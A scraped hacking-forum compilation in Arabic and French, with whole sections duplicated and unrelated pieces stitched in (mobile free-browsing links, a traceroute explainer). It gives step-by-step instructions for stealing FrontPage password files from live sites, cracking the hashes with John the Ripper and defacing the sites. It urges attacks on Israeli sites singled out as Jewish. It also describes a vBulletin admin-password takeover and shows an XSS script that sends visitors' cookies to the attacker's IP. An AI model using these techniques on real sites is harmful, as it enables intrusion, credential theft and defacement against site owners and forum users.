Administrator.pwd
Author.pwd
Service.pwd وغالبا تكون الكلمة السرية في هذا المجلد , والذي هو متفرع من _Vti_pvt .
.....طبعا كلكم عارفين الحجات دي .. بس ممكن بعضكم ما قدرش يخترق بيها عشان مافهمش كويس من دروس غير .......المهم أنا هاشرحلكم درس عملي من A to Z للاختراق عن طريق الثغرة دي .
كنا قلنا ان الثغرة غالبا بتكون هنا www.site.com/_vti_pvt/_service.pwd , طب ممكن واحد يقول طب أنا جربت اكتب كدة مع مواقع كتيرة و بيطلعلي error أو Forbidien .....المهم ممكن الAdmin يكون عامل security شوية على الملف ده ..... طيب عشان تجرب وتنفذ هتتبع التالي:
ادخل على الموقع دة
www.altavista.com
وبعدين اكتب في الSearch الكلام دة Link:_Service.pwd أو اكتب Link:_vti_pvt/_service.pwd
المهم هيطلعلك نتايج بالهبل و معظمها تعاني من الثغرة دي , مثال http://www.soi-rp.com/_vti_pvt/ ادخل هنا , هيظهرلك صفحة وفيها الحجات دي :
Parent Directory
-
-
.......... المهم خش على Service.pwd هتلاقي حاجة زي كدة : # -FrontPage- orechron:zjcZSlimQERyw
orechron ده الuser name
zjcZSlimQERyw ودي الpassword بس ماتجربهاش عشان دي مشفرة ....طيب عشان تفكها هتحتاج لjohn the ripper ممكن تحملها من هنا openwall.com المهم لما تحمل الأداة هتلاقي مجلدين run و doc والمهم هوه run بالنسبة لطيرقة العمل هاتكون كالتالي .... هاتلاقي ملف عندك في الجهاز اسمو command موجود في System32 انسخه وضعه في المجلد run .... وبعدين تحطorechron:zjcZSlimQERyw في ملف txt وليكن باسم password .....طيب افتح command واكتب الامرده <john -i:all password.txt
وبعد مايخلص البرنامج هتلاقي الpassword الحقيقية هنا john.pot
كدة خلاص ... وصلنا للختام وهوه انك تصمم صفحة بالفرونت بيدج وتكتب فيها Hacked by ^SpY^
وتعمل pubish web هايطلب username و password هاتكتبهم و..... و مبروك عليك الاختراق .
و عموما أنصحكم بالبحث هنا عشان دي مواقع يهوديه تبحث بطريقة الSpiders يعني Random Hacking :
achla.co.il
maven.co.il
iguide.co.il
____________________________
طرق معرفة واختراق المواقع التي تدعم FrontPage
كثر منا يعلم ان هذه الثغرة خاصة بنظام// NT - Unix
1-وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟
بعدة طرق ولن أذكر إلا الأسهل:
- بالذهاب إلى موقع netcraft
http://www.netcraft.com/
وكتابة اسم الموقع وبعد البحث سوف يظهر
mod_frontpage/x
x=(رقم الإصدار الخاص بالفرونت بيج)
- عن طريق إضافة جملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/
نضيف الجملة ليصبح بهذه الطريقة
http://www.almodammer.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج
- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
http://www.almodammer.com/_vti_cnf
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به
--------------------------------------------------
2-ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال
http://www.almodammer.com/
يدعم fontpage طيب نذهب إلى ملف vti_pvt_
كذا يعني
http://www.almodammer.com/_vti_pvt
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username : passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم : operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM
ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
=(John The Ripper)=
راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper
لتحميل البرنامج من هذا الموقع::
http://www.openwall.com/john
كيف تفك التشفير بهذا البرنامج
أول شي تروح تنقل البرنامج إلى مجلد
:c
بعدين تفتح مجلد RUN
وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها
إذهب إلى
ابدأ start
تشغيل run
اكتب الأمر
command
اضغط على Enter وبعدها راح يفتح
إطار الـDoS
اذهب إلى مجلد RUN
وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
..cd
حتى توصل
<:c
بعدين اكتب
cd john
اضغط على Enter
وراح يظهر لك بهذا الشكل
<c:john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
<c:/john/RUN
ألحين نكتب أوامر برنامج John The Ripper
وهي
====
john -i:all passd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات
====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة
====
john -i: Digits passwd.txt
----------------------------------
يبحث عن الأرقام
====
john -i:single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------
إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
frontpage
بعدين
file وتذهب إلى
open web وتضيف
الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك
======================================
وألحين أكيد تبون تجربون على موقع أقولكم روحوا google
http://www.google.com/
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
وعندك محرك بحث
http://www.altavista.com/
تكتب في محرك البحث
link:service.pwd
أو..
link:adminstrators
وغيرها من الملفات الاحتمال وجود password فيها
1-وسف أقوم الآن بشرح طريقة لمعرفة هل هذه المواقع تدعم frontpage أم لا؟
بعدة طرق ولن أذكر إلا الأسهل:
- بالذهاب إلى موقع netcraft
http://www.netcraft.com/
وكتابة اسم الموقع وبعد البحث سوف يظهر
mod_frontpage/x
x=(رقم الإصدار الخاص بالفرونت بيج)
- عن طريق إضافة جملة
vti_inf.html_/
بعد عنوان الموقع لنفرض أن الموقع:http://www.almodammer.com/
نضيف الجملة ليصبح بهذه الطريقة
http://www.almodammer.com/_vti_inf.html
وبعدها اضغط Enter
وراح يطلعلك في أول الصفحة هذه الكلمة
Frontpage Configuration Information
أي قد تم تثبيت مجلدات وبرامج الفرونت بيج
- وأيضا تستطيع معرفة الموقع يدعم الفرونت بيج أم لا
بإضافة
vti_cnf_/
بعد عنوان الموقع كهذا المثال:
http://www.almodammer.com/_vti_cnf
واضغط زر الفأرة الأيمن واختار
source المصدر
وابحث عن
vti_generator:Programe
حيث
Programe تعني لنوع برنامج الفرونت بيج والإصدارات الخاصة به
--------------------------------------------------
2-ألحين وعرفنا الموقع يدعم frontpage كيف نقدر نوصل لملف الباسوورد؟
بسيطة إنت هات الموقع الي يبدعم frontpage واعلمك
يعني وعلى سبيل المثال
http://www.almodammer.com/
يدعم fontpage طيب نذهب إلى ملف vti_pvt_
كذا يعني
http://www.almodammer.com/_vti_pvt
وأول ماندخله نلاحظ وجود ملفات عديدة وأهم الملفات التي تأتي باسم:
=============
Adminstrator.pwd
Adminstrators.pwd
Service.pwd
Users.pwd
User.pwd
Author.pwd
=============
ألحين لنفرض إننا فتحنا أحد هذه الملفات ماذا نلاحظ نلاحظ وجود
username : passwd
اسم المستخدم والباسوورد
يعني انا اخترقت موقع بالفرونت بيج ولما جيت ابي اشوف الملفات طلعلي ملف service يحتوي على user / password
وهذا مضمون الملف
operator:hi9LHn9wAMuKM
حيث اسم المستخدم : operator
الباسوورد المشفرة هي:hi9LHn9wAMuKM
ألحين وعرفنا يااخواني كيف نطلع الباسوورد المشفر ماباقي إلا نفك تشفيره
وهذا يتم ببرامج كثير
=(Crack Jack)=
=(John The Ripper)=
راح نستخدم الأفضل والأكثر تداولا وهو
John The Ripper
لتحميل البرنامج من هذا الموقع::
http://www.openwall.com/john
كيف تفك التشفير بهذا البرنامج
أول شي تروح تنقل البرنامج إلى مجلد
:c
بعدين تفتح مجلد RUN
وتسويلك مستند نصي txt وتسمي الملف passwd وتضع فيه كلمة السر الي تبي تفك تشفيرها
إذهب إلى
ابدأ start
تشغيل run
اكتب الأمر
command
اضغط على Enter وبعدها راح يفتح
إطار الـDoS
اذهب إلى مجلد RUN
وذلك بالخروج من المجلدات الي راح تظهر لك واذا تبي تطلع من أي مجلد استخدم الأمر
..cd
حتى توصل
<:c
بعدين اكتب
cd john
اضغط على Enter
وراح يظهر لك بهذا الشكل
<c:john
واكتب
cd RUN
وبتدخل المجلد ليصبح بهذه الطريقة
<c:/john/RUN
ألحين نكتب أوامر برنامج John The Ripper
وهي
====
john -i:all passd.txt
--------------------------
يبحث لك عن جميع الأنواع والاحتمالات
====
john -i:Alpha passwd.txt
----------------------------------
يبحث عن الأحرف الصغيرة
====
john -i: Digits passwd.txt
----------------------------------
يبحث عن الأرقام
====
john -i:single passwd.txt
---------------------------------
أمر يبحث لك عن الباسووردات التي تطابق اسم المستخدم
--------------------------------------------------------------------------------
وبعد ماتجرب كل هذي الأوامر وإذا تبي تشوف هل إنت فكيت وكسرت الباسوورد ولا لأ إذهب إلى
john.pot
الموجود داخل البرنامج وراح يعرض لك الباسوورد وبعد فك تشفيرها
--------------------------------------------------------------------------------
إنت ألحين مستريح عندك username والـpassword
وش بقالك ؟!!
يقالك تلعب بالموقع لعب ألحين دخوله بعدة طرق وأحسنها من/
frontpage
بعدين
file وتذهب إلى
open web وتضيف
الاسم والباسوورد وعاد كذا انت الحين تقدر تعدل الملفات على كيفك
من FTP
وعليك ببرامج الـFTP المنتشرة
كالـws-ftp
والـpro ftp
والمزيد ...
ويمكنك عمل الطريقة من DOS ولكن البرامج أسهل لك وأضمن لك
======================================
وألحين أكيد تبون تجربون على موقع أقولكم روحوا google
http://www.google.com/
واكتبوا في إطار البحث
vti_pvt_/
وراح تطلعلك مواقع كثيرة تحتوي على هذه الثغرة
وعندك محرك بحث
http://www.altavista.com/
تكتب في محرك البحث
link:service.pwd
أو..
link:adminstrators
وغيرها من الملفات الاحتمال وجود password فيها
DETECTER VOTRE ADRESSE IP
bey mr electroman
ouvrer bloc note puis copier coller ce code la et enregister en format .html exepmle index.htm
ouvrer bloc note puis copier coller ce code la et enregister en format .html exepmle index.htm
ثغرة في Hyper Terminal في نظم Msn
Electroman please your attention
COMMAND
HyperTerminal
SYSTEMS AFFECTED
Win2000 (all versions), Me, 98 and 98SE
PROBLEM
The USSR Team has found a buffer overflow in the HyperTerminal
telnet client, which is in the code that processes the Telnet
URL's, that can enable an attacker to execute arbitrary code on
another user's system. If a user opens an mail containing HTML
and also contains a malformed Telnet URL a buffer overrun will
enable the creator of the mail to cause arbitrary code to be
runned on the user's system.
Example:
telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/
The other resides in a section of the code that processes session
files - files that enable HyperTerminal users to specify session
parameters such as the connection method and the destination
host. If a user opened a session file that contained a particular
type of malformed information, it would trigger the buffer
overrun.
SOLUTION
Microsoft has re-released original bulletin in May 2001 to inform
customers of the availability of an updated set of patches to
address both the original and a second vulnerability identified
in HyperTerminal. Information about the second issue is discussed
in the PROBLEM section above.
A patch is available to fix this vulnerability. Please read the
Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/ms00-079.asp
for information on obtaining this patch.
COMMAND
HyperTerminal
SYSTEMS AFFECTED
Win2000 (all versions), Me, 98 and 98SE
PROBLEM
The USSR Team has found a buffer overflow in the HyperTerminal
telnet client, which is in the code that processes the Telnet
URL's, that can enable an attacker to execute arbitrary code on
another user's system. If a user opens an mail containing HTML
and also contains a malformed Telnet URL a buffer overrun will
enable the creator of the mail to cause arbitrary code to be
runned on the user's system.
Example:
telnet://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaa/
The other resides in a section of the code that processes session
files - files that enable HyperTerminal users to specify session
parameters such as the connection method and the destination
host. If a user opened a session file that contained a particular
type of malformed information, it would trigger the buffer
overrun.
SOLUTION
Microsoft has re-released original bulletin in May 2001 to inform
customers of the availability of an updated set of patches to
address both the original and a second vulnerability identified
in HyperTerminal. Information about the second issue is discussed
in the PROBLEM section above.
A patch is available to fix this vulnerability. Please read the
Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/ms00-079.asp
for information on obtaining this patch.
طريقة اختراق المنتديات
طريقة اختراق المنتديات
الكاتب : لا اعرف عنه اى شئ
اختراق المنتديات بس بمنتديات vb
. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
http://URL/memberlist.php
URL = العنوان المستضيف للمنتدى
مثل = - .com
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
http://URL/member.php?soitgoe68e45u...info&userid=266
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
http://URL/member.php?soitgoe68e45u...etinfo&userid=1
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
http://URL/member.php?action=login&...VALI...39;').'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
الكاتب : لا اعرف عنه اى شئ
اختراق المنتديات بس بمنتديات vb
. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
http://URL/memberlist.php
URL = العنوان المستضيف للمنتدى
مثل = - .com
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
http://URL/member.php?soitgoe68e45u...info&userid=266
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
http://URL/member.php?soitgoe68e45u...etinfo&userid=1
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
http://URL/member.php?action=login&...VALI...39;').'
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
http://url/index.php
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
اختراق منتديات الـــ vBulletin
بسم الله الرحمن الرحيم
يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...
---------
مقدمة :
---------
الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة لسيت للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
document.write('<img
src="http://my_ip_address/'+document.cookie+'">';
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
------------
الحل
-----------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة فاذا وضعت او او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .
تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .
السريفر الشخصي
http://belnet.dl.sourceforge.net/so...ptriad2-2-1.exe
هذا سريفر الاباتشي
يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...
---------
مقدمة :
---------
الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة لسيت للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
src="http://my_ip_address/'+document.cookie+'">';
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi
sit=1011983161
فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=[userid]&bbpassword=[password hash]
ستجد عبارة : " أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز....) "
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..
اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !
------------
الحل
-----------
للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + ... )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )
كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر ... لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont' be Lamer .
تاريخ اكتشاف الثغرة : 31 - 1 - 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .
السريفر الشخصي
http://belnet.dl.sourceforge.net/so...ptriad2-2-1.exe
هذا سريفر الاباتشي
Imaginer je réalise voila mr elctroman
exclusivités
après des longes recherches pour avoir une stable connections gprs en passant pare les sites comme meebo https://meebo.com ou bie https://imo.com en réaliser notre objectif et en vous présent pour la premier fois et en exclusivités centova la messagerie instantanées de rêve
https://cetanova.net présenter par mr electroman alors dit-e- merci !!!! :D
après des longes recherches pour avoir une stable connections gprs en passant pare les sites comme meebo https://meebo.com ou bie https://imo.com en réaliser notre objectif et en vous présent pour la premier fois et en exclusivités centova la messagerie instantanées de rêve
https://cetanova.net présenter par mr electroman alors dit-e- merci !!!! :D
imedia free links ---imedia sites gratuits---
voila une collection des sites web es marche a 100% avec imedia présenter par electroman
wap.meditel.ma.wapamp.com/users9/0katana
wap.meditel.ma.www.goalzz.com
wap.meditel.ma.wap.esato.com/xhtml
wap.meditel.ma.wanawap.com
wap.meditel.ma.waptrick.com
wap.meditel.ma.gamawap.com
wap.meditel.ma.www.3gforfree.com/mobile
wap.meditel.ma.mobile.itsmy.com/umts/index.php3
wap.meditel.ma.dejavuwap.com/xhtmlcommunity/index
wap.meditel.ma.m.radar.net
wap.meditel.ma.m.taptap.net
wap.meditel.ma.wap.gamoku.com
wap.meditel.ma.www.4shared.com
wap.meditel.ma.fotochatter.com/index.php
wap.meditel.ma.m.vtap.com
wap.meditel.ma.ringermobile.com
wap.meditel.ma.wapamp.com/users9/0katana
wap.meditel.ma.www.goalzz.com
wap.meditel.ma.wap.esato.com/xhtml
wap.meditel.ma.wanawap.com
wap.meditel.ma.waptrick.com
wap.meditel.ma.gamawap.com
wap.meditel.ma.www.3gforfree.com/mobile
wap.meditel.ma.mobile.itsmy.com/umts/index.php3
wap.meditel.ma.dejavuwap.com/xhtmlcommunity/index
wap.meditel.ma.m.radar.net
wap.meditel.ma.m.taptap.net
wap.meditel.ma.wap.gamoku.com
wap.meditel.ma.www.4shared.com
wap.meditel.ma.fotochatter.com/index.php
wap.meditel.ma.m.vtap.com
wap.meditel.ma.ringermobile.com
تعرف على
Traceroute
الأمر Traceroute وهو من أوامر الدوس ويستخدم لتتبع المسار حتى الوصول الى العنوان او الموقع المطلوب تتبع المسار له.
فكره تتبع المسار قائمه على فكره بسيطة وهي تزويد حزمه البيانات المرسله من الحاسب بخانه تسمى (Time-to-live) او تختصر بـ TTL و المقصود بها زمن الحياه للحزمة. يوضع في تلك الخانه رقم على سبيل المثال (3) و هذا يعني ان الحزمة ستعيش ثلاثه قفزات (Router) او خادم (Server) خلال تجولها عبر الشبكه.
الذي يحدث كالتالي:
لنسمي النقطة التي يكون فيها محول او خادم في الشبكه بنقطة التوزيع.
يقوم الحاسب بأرسال الحزمة و فيها محدد عمرها برقم وهو TTL عند وصول الحزمة لنقطة التوزيع الأولى (للمحول الأول في الشبكه (Roter) او الخادم) تقوم نقطة التوزيع بتنقيص هذا الرقم بمقدار واحد ثم ترسل الحزمة للنقطة التاليه.
عندما تصل الحزمة لنقطة توزيع بحيث يكون عمر الحزمة صفر بعد انقاص واحد منها ترسل نقطة التوزيع رد لمصدر الحزمة (حاسبك) تخبره عن موت الحزمة (اي توقفها عند تلك النقطة) و ضمن الرد تكون هناك المعلومات.
من الضروري وضع عمر للحزمة و الا ستعج الشبكات بحزم تائه تتنقل من نقطة الى نقطة بدون هدى.
ماذا يحدث عند استخدام الأمر Traceroute ؟
يقوم الحاسب بوضع عمر الحزمة 1 ثم يرسلها فيصله الرد من نقطه التوزيع الأولى (بالعزاء).
